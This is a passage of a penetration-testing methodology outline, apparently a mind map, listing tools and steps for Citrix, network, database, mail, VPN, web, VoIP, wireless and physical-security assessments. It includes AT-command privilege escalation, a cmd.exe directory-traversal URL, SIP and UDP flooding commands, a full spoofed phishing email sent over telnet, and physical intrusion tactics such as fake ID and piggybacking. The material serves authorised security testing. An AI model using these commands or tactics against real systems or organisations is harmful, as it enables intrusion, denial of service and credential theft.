20.4.3.4. AT Command - priviledge escalation

20.4.3.4.1. AT HH:MM /interactive "cmd.exe"

20.4.3.4.2. AT HH:MM /interactive %comspec% /k

20.4.3.4.3. Untitled

20.4.3.5. Keyboard Shortcuts/ Hotkeys

20.4.3.5.1. Ctrl + h – View History

20.4.3.5.2. Ctrl + n – New Browser

20.4.3.5.3. Shift + Left Click – New Browser

20.4.3.5.4. Ctrl + o – Internet Address (browse feature)

20.4.3.5.5. Ctrl + p – Print (to file)

20.4.3.5.6. Right Click (Shift + F10)

20.4.3.5.7. F1 – Jump to URL

20.4.3.5.8. SHIFT+F1: Local Task List

20.4.3.5.9. SHIFT+F2: Toggle Title Bar

20.4.3.5.10. SHIFT+F3: Close Remote Application

20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

20.4.3.5.12. CTRL+F2: Remote Task List

20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

20.4.3.5.14. ALT+F2: Cycle through programs

20.4.3.5.15. ALT+PLUS: Alt+TAB

20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

20.5. Brute Force

20.5.1. bforce.js

20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

20.5.1.3. Untitled

20.6. Review Configuration Files

20.6.1. Application server configuration file

20.6.1.1. appsrv.ini

20.6.1.1.1. Location

20.6.1.1.2. World writeable

20.6.1.1.3. Review other files

20.6.1.1.4. Sample file

20.6.2. Program Neighborhood configuration file

20.6.2.1. pn.ini

20.6.2.1.1. Location

20.6.2.1.2. Review other files

20.6.2.1.3. Sample file

20.6.3. Citrix ICA client configuration file

20.6.3.1. wfclient.ini

20.6.3.1.1. Location

20.7. References

20.7.1. Vulnerabilities

20.7.1.1. Art of Hacking

20.7.1.2. Common Vulnerabilities and Exploits (CVE)

20.7.1.2.1. Sample file

20.7.1.2.2. Untitled

20.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

20.7.1.3. OSVDB

20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

20.7.1.4. Secunia

20.7.1.5. Security-database.com

20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

20.7.1.6. SecurityFocus

20.7.2. Support

20.7.2.1. Citrix

20.7.2.1.1. Knowledge Base

20.7.2.2. Thinworld

20.7.3. Exploits

20.7.3.1. Milw0rm

20.7.3.1.1. http://www.milw0rm.com/search.php

20.7.3.2. Art of Hacking

20.7.3.2.1. Citrix

20.7.4. Tools Resource

20.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

21. Network Backbone

21.1. Generic Toolset

21.1.1. Wireshark (Formerly Ethereal)

21.1.1.1. Passive Sniffing

21.1.1.1.1. Usernames/Passwords

21.1.1.1.2. Email

21.1.1.1.3. FTP

21.1.1.1.4. HTTP

21.1.1.1.5. HTTPS

21.1.1.1.6. RDP

21.1.1.1.7. VOIP

21.1.1.1.8. Other

21.1.1.2. Filters

21.1.1.2.1. ip.src == ip_address

21.1.1.2.2. ip.dst == ip_address

21.1.1.2.3. tcp.dstport == port_no.

21.1.1.2.4. ! ip.addr == ip_address

21.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

21.1.2. Cain & Abel

21.1.2.1. Active Sniffing

21.1.2.1.1. ARP Cache Poisoning

21.1.2.1.2. DNS Poisoning

21.1.2.1.3. Routing Protocols

21.1.3. Cisco-Torch

21.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

21.1.4. NTP-Fingerprint

21.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

21.1.5. Yersinia

21.1.6. p0f

21.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

21.1.7. Manual Check (Credentials required)

21.1.8. MAC Spoofing

21.1.8.1. mac address changer for windows

21.1.8.2. macchanger

21.1.8.2.1. Random Mac Address:- macchanger -r eth0

21.1.8.3. madmacs

21.1.8.4. smac

21.1.8.5. TMAC

22. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

22.1. Password Attacks

22.1.1. Known Accounts

22.1.1.1. Identified Passwords

22.1.1.2. Unidentified Hashes

22.1.2. Default Accounts

22.1.2.1. Identified Passwords

22.1.2.2. Unidentified Hashes

22.2. Exploits

22.2.1. Successful Exploits

22.2.1.1. Accounts

22.2.1.1.1. Passwords

22.2.1.1.2. Groups

22.2.1.1.3. Other Details

22.2.1.2. Services

22.2.1.3. Backdoor

22.2.1.4. Connectivity

22.2.2. Unsuccessful Exploits

22.2.3. Resources

22.2.3.1. Securiteam

22.2.3.1.1. Exploits are sorted by year and must be downloaded individually

22.2.3.2. SecurityForest

22.2.3.2.1. Updated via CVS after initial install

22.2.3.3. GovernmentSecurity

22.2.3.3.1. Need to create and account to obtain access

22.2.3.4. Red Base Security

22.2.3.4.1. Oracle Exploit site only

22.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

22.2.3.5.1. Wireless Exploit Site

22.2.3.6. PacketStorm Security

22.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

22.2.3.7. SecWatch

22.2.3.7.1. Exploits sorted by year and month, download seperately

22.2.3.8. SecurityFocus

22.2.3.8.1. Exploits must be downloaded individually

22.2.3.9. Metasploit

22.2.3.9.1. Install and regualrly update via svn

22.2.3.10. Milw0rm

22.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

22.3. Tools

22.3.1. Metasploit

22.3.1.1. Free Extra Modules

22.3.1.1.1. local copy

22.3.2. Manual SQL Injection

22.3.2.1. Understanding SQL Injection

22.3.2.2. SQL Injection walkthrough

22.3.2.3. SQL Injection by example

22.3.2.4. Blind SQL Injection

22.3.2.5. Advanced SQL Injection in SQL Server

22.3.2.6. More Advanced SQL Injection

22.3.2.7. Advanced SQL Injection in Oracle databases

22.3.2.8. SQL Cheatsheets

22.3.2.8.1. Untitled

22.3.3. SQL Power Injector

22.3.4. SecurityForest

22.3.5. SPI Dynamics WebInspect

22.3.6. Core Impact

22.3.7. Cisco Global Exploiter

22.3.8. PIXDos

22.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

22.3.9. CANVAS

22.3.10. Inguma

23. Server Specific Tests

23.1. Databases

23.1.1. Direct Access Interrogation

23.1.1.1. MS SQL Server

23.1.1.1.1. Ports

23.1.1.1.2. Version

23.1.1.1.3. osql

23.1.1.2. Oracle

23.1.1.2.1. Ports

23.1.1.2.2. TNS Listener

23.1.1.2.3. SQL Plus

23.1.1.2.4. Default Account/Passwords

23.1.1.2.5. Default SID's

23.1.1.3. MySQL

23.1.1.3.1. Ports

23.1.1.3.2. Version

23.1.1.3.3. Users/Passwords

23.1.1.4. DB2

23.1.1.5. Informix

23.1.1.6. Sybase

23.1.1.7. Other

23.1.2. Scans

23.1.2.1. Default Ports

23.1.2.2. Non-Default Ports

23.1.2.3. Instance Names

23.1.2.4. Versions

23.1.3. Password Attacks

23.1.3.1. Sniffed Passwords

23.1.3.1.1. Cracked Passwords

23.1.3.1.2. Hashes

23.1.3.2. Direct Access Guesses

23.1.4. Vulnerability Assessment

23.1.4.1. Automated

23.1.4.1.1. Reports

23.1.4.1.2. Vulnerabilities

23.1.4.2. Manual

23.1.4.2.1. Patch Levels

23.1.4.2.2. Confirmed Vulnerabilities

23.2. Mail

23.2.1. Scans

23.2.2. Fingerprint

23.2.2.1. Manual

23.2.2.2. Automated

23.2.3. Spoofable

23.2.3.1. Telnet spoof

23.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].

23.2.4. Relays

23.3. VPN

23.3.1. Scanning

23.3.1.1. 500 UDP IPSEC

23.3.1.2. 1723 TCP PPTP

23.3.1.3. 443 TCP/SSL

23.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

23.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

23.3.2. Fingerprinting

23.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

23.3.3. PSK Crack

23.3.3.1. ikeprobe 80.75.68.27

23.3.3.2. sniff for responses with C&A or ikecrack

23.4. Web

23.4.1. Vulnerability Assessment

23.4.1.1. Automated

23.4.1.1.1. Reports

23.4.1.1.2. Vulnerabilities

23.4.1.2. Manual

23.4.1.2.1. Patch Levels

23.4.1.2.2. Confirmed Vulnerabilities

23.4.2. Permissions

23.4.2.1. PUT /test.txt HTTP/1.0

23.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

23.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

23.4.3. Scans

23.4.4. Fingerprinting

23.4.4.1. Other

23.4.4.2. HTTP

23.4.4.2.1. Commands

23.4.4.2.2. Modules

23.4.4.2.3. File Extensions

23.4.4.3. HTTPS

23.4.4.3.1. Commands

23.4.4.3.2. Commands

23.4.4.3.3. File Extensions

23.4.5. Directory Traversal

23.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

24. VoIP Security

24.1. Sniffing Tools

24.1.1. AuthTool

24.1.2. Cain & Abel

24.1.3. Etherpeek

24.1.4. NetDude

24.1.5. Oreka

24.1.6. PSIPDump

24.1.7. SIPomatic

24.1.8. SIPv6 Analyzer

24.1.9. UCSniff

24.1.10. VoiPong

24.1.11. VOMIT

24.1.12. Wireshark

24.1.13. WIST - Web Interface for SIP Trace

24.2. Scanning and Enumeration Tools

24.2.1. enumIAX

24.2.2. fping

24.2.3. IAX Enumerator

24.2.4. iWar

24.2.5. Nessus

24.2.6. Nmap

24.2.7. SIP Forum Test Framework (SFTF)

24.2.8. SIPcrack

24.2.9. sipflanker

24.2.9.1. python sipflanker.py 192.168.1-254

24.2.10. SIP-Scan

24.2.11. SIP.Tastic

24.2.12. SIPVicious

24.2.13. SiVuS

24.2.14. SMAP

24.2.14.1. smap IP_Address/Subnet_Mask

24.2.14.2. smap -o IP_Address/Subnet_Mask

24.2.14.3. smap -l IP_Address

24.2.15. snmpwalk

24.2.16. VLANping

24.2.17. VoIPAudit

24.2.18. VoIP GHDB Entries

24.2.19. VoIP Voicemail Database

24.3. Packet Creation and Flooding Tools

24.3.1. H.323 Injection Files

24.3.2. H225regreject

24.3.3. IAXHangup

24.3.4. IAXAuthJack

24.3.5. IAX.Brute

24.3.6. IAXFlooder

24.3.6.1. ./iaxflood sourcename destinationname numpackets

24.3.7. INVITE Flooder

24.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

24.3.8. kphone-ddos

24.3.9. RTP Flooder

24.3.10. rtpbreak

24.3.11. Scapy

24.3.12. Seagull

24.3.13. SIPBomber

24.3.14. SIPNess

24.3.15. SIPp

24.3.16. SIPsak

24.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

24.3.16.2. Options request:- sipsak -vv -s sip:username@domain

24.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

24.3.17. SIP-Send-Fun

24.3.18. SIPVicious

24.3.19. Spitter

24.3.20. TFTP Brute Force

24.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

24.3.21. UDP Flooder

24.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

24.3.22. UDP Flooder (with VLAN Support)

24.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

24.3.23. Voiphopper

24.4. Fuzzing Tools

24.4.1. Asteroid

24.4.2. Codenomicon VoIP Fuzzers

24.4.3. Fuzzy Packet

24.4.4. Mu Security VoIP Fuzzing Platform

24.4.5. ohrwurm RTP Fuzzer

24.4.6. PROTOS H.323 Fuzzer

24.4.7. PROTOS SIP Fuzzer

24.4.8. SIP Forum Test Framework (SFTF)

24.4.9. Sip-Proxy

24.4.10. Spirent ThreatEx

24.5. Signaling Manipulation Tools

24.5.1. AuthTool

24.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

24.5.2. BYE Teardown

24.5.3. Check Sync Phone Rebooter

24.5.4. RedirectPoison

24.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

24.5.5. Registration Adder

24.5.6. Registration Eraser

24.5.7. Registration Hijacker

24.5.8. SIP-Kill

24.5.9. SIP-Proxy-Kill

24.5.10. SIP-RedirectRTP

24.5.11. SipRogue

24.5.12. vnak

24.6. Media Manipulation Tools

24.6.1. RTP InsertSound

24.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.2. RTP MixSound

24.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.3. RTPProxy

24.6.4. RTPInject

24.7. Generic Software Suites

24.7.1. OAT Office Communication Server Tool Assessment

24.7.2. EnableSecurity VOIPPACK

24.7.2.1. Note: - Add-on for Immunity Canvas

24.8. References

24.8.1. URL's

24.8.1.1. Common Vulnerabilities and Exploits (CVE)

24.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

24.8.1.2. Default Passwords

24.8.1.3. Hacking Exposed VoIP

24.8.1.3.1. Tool Pre-requisites

24.8.1.4. VoIPsa

24.8.2. White Papers

24.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

24.8.2.2. An Analysis of VoIP Security Threats and Tools

24.8.2.3. Hacking VoIP Exposed

24.8.2.4. Security testing of SIP implementations

24.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

24.8.2.6. Two attacks against VoIP

24.8.2.7. VoIP Attacks!

24.8.2.8. VoIP Security Audit Program (VSAP)

25. Wireless Penetration

25.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

25.1.1. Site Map

25.1.1.1. RF Map

25.1.1.1.1. Lines of Sight

25.1.1.1.2. Signal Coverage

25.1.1.2. Physical Map

25.1.1.2.1. Triangulate APs

25.1.1.2.2. Satellite Imagery

25.1.2. Network Map

25.1.2.1. MAC Filter

25.1.2.1.1. Authorised MAC Addresses

25.1.2.1.2. Reaction to Spoofed MAC Addresses

25.1.2.2. Encryption Keys utilised

25.1.2.2.1. WEP

25.1.2.2.2. WPA/PSK

25.1.2.2.3. 802.1x

25.1.2.3. Access Points

25.1.2.3.1. ESSID

25.1.2.3.2. BSSIDs

25.1.2.4. Wireless Clients

25.1.2.4.1. MAC Addresses

25.1.2.4.2. Intercepted Traffic

25.2. Wireless Toolkit

25.2.1. Wireless Discovery

25.2.1.1. Aerosol

25.2.1.2. Airfart

25.2.1.3. Aphopper

25.2.1.4. Apradar

25.2.1.5. BAFFLE

25.2.1.6. inSSIDer

25.2.1.7. iWEPPro

25.2.1.8. karma

25.2.1.9. KisMAC-ng

25.2.1.10. Kismet

25.2.1.11. MiniStumbler

25.2.1.12. Netstumbler

25.2.1.13. Vistumbler

25.2.1.14. Wellenreiter

25.2.1.15. Wifi Hopper

25.2.1.16. WirelessMon

25.2.1.17. WiFiFoFum

25.2.2. Packet Capture

25.2.2.1. Airopeek

25.2.2.2. Airpcap

25.2.2.3. Airtraf

25.2.2.4. Apsniff

25.2.2.5. Cain

25.2.2.6. Commview

25.2.2.7. Ettercap

25.2.2.8. Netmon

25.2.2.8.1. nmwifi

25.2.2.9. Wireshark

25.2.3. EAP Attack tools

25.2.3.1. eapmd5pass

25.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

25.2.3.1.2. Untitled

25.2.4. Leap Attack Tools

25.2.4.1. asleap

25.2.4.2. thc leap cracker

25.2.4.3. anwrap

25.2.5. WEP/ WPA Password Attack Tools

25.2.5.1. Airbase

25.2.5.2. Aircrack-ptw

25.2.5.3. Aircrack-ng

25.2.5.4. Airsnort

25.2.5.5. cowpatty

25.2.5.6. FiOS Wireless Key Calculator

25.2.5.7. iWifiHack

25.2.5.8. KisMAC-ng

25.2.5.9. Rainbow Tables

25.2.5.10. wep attack

25.2.5.11. wep crack

25.2.5.12. wzcook

25.2.6. Frame Generation Software

25.2.6.1. Airgobbler

25.2.6.2. airpwn

25.2.6.3. Airsnarf

25.2.6.4. Commview

25.2.6.5. fake ap

25.2.6.6. void 11

25.2.6.7. wifi tap

25.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

25.2.6.8. FreeRADIUS - Wireless Pwnage Edition

25.2.7. Mapping Software

25.2.7.1. Online Mapping

25.2.7.1.1. WIGLE

25.2.7.1.2. Skyhook

25.2.7.2. Tools

25.2.7.2.1. Knsgem

25.2.8. File Format Conversion Tools

25.2.8.1. ns1 recovery and conversion tool

25.2.8.2. warbable

25.2.8.3. warkizniz

25.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

25.2.8.4. ivstools

25.2.9. IDS Tools

25.2.9.1. WIDZ

25.2.9.2. War Scanner

25.2.9.3. Snort-Wireless

25.2.9.4. AirDefense

25.2.9.5. AirMagnet

25.3. WLAN discovery

25.3.1. Unencrypted WLAN

25.3.1.1. Visible SSID

25.3.1.1.1. Sniff for IP range

25.3.1.2. Hidden SSID

25.3.1.2.1. Deauth client

25.3.2. WEP encrypted WLAN

25.3.2.1. Visible SSID

25.3.2.1.1. WEPattack

25.3.2.2. Hidden SSID

25.3.2.2.1. Deauth client

25.3.3. WPA / WPA2 encrypted WLAN

25.3.3.1. Deauth client

25.3.3.1.1. Capture EAPOL handshake

25.3.4. LEAP encrypted WLAN

25.3.4.1. Deauth client

25.3.4.1.1. Break LEAP

25.3.5. 802.1x WLAN

25.3.5.1. Create Rogue Access Point

25.3.5.1.1. Airsnarf

25.3.5.1.2. fake ap

25.3.5.1.3. Hotspotter

25.3.5.1.4. Karma

25.3.5.1.5. Linux rogue AP

25.3.6. Resources

25.3.6.1. URL's

25.3.6.1.1. Wirelessdefence.org

25.3.6.1.2. Russix

25.3.6.1.3. Wardrive.net

25.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

25.3.6.2. White Papers

25.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

25.3.6.2.2. 802.11b Firmware-Level Attacks

25.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

25.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

25.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

25.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

25.3.6.2.7. Active behavioral fingerprinting of wireless devices

25.3.6.3. Common Vulnerabilities and Exploits (CVE)

25.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

26. Physical Security

26.1. Building Security

26.1.1. Meeting Rooms

26.1.1.1. Check for active network jacks.

26.1.1.2. Check for any information in room.

26.1.2. Lobby

26.1.2.1. Check for active network jacks.

26.1.2.2. Does receptionist/guard leave lobby?

26.1.2.3. Accessbile printers? Print test page.

26.1.2.4. Obtain phone/personnel listing.

26.1.3. Communal Areas

26.1.3.1. Check for active network jacks.

26.1.3.2. Check for any information in room.

26.1.3.3. Listen for employee conversations.

26.1.4. Room Security

26.1.4.1. Resistance of lock to picking.

26.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

26.1.4.2. Ceiling access areas.

26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

26.1.5. Windows

26.1.5.1. Check windows/doors for visible intruderalarm sensors.

26.1.5.2. Check visible areas for sensitive information.

26.1.5.3. Can you video users logging on?

26.2. Perimeter Security

26.2.1. Fence Security

26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

26.2.2. Exterior Doors

26.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

26.2.3. Guards

26.2.3.1. Patrol Routines

26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

26.2.3.2. Communications

26.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

26.3. Entry Points

26.3.1. Guarded Doors

26.3.1.1. Piggybacking

26.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

26.3.1.2. Fake ID

26.3.1.2.1. Attempt to use fake ID to gain access.

26.3.1.3. Access Methods

26.3.1.3.1. Test 'out of hours' entry methods

26.3.2. Unguarded Doors

26.3.2.1. Identify all unguardedentry points.

26.3.2.1.1. Are doors secured?

26.3.2.1.2. Check locks for resistance to lock picking.

26.3.3. Windows

26.3.3.1. Check windows/doors for visible intruderalarm sensors.

26.3.3.1.1. Attempt to bypass sensors.

26.4. Office Waste

26.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

27. Final Report - template

28. Contributors

28.1. Matt Byrne (WirelessDefence.org)

28.1.1. Matt contributed the majority of the Wireless section.

28.2. Arvind Doraiswamy (Paladion.net)

28.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

28.3. Lee Lawson (Dns.co.uk)

28.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

28.4. Nabil OUCHN (Security-database.com)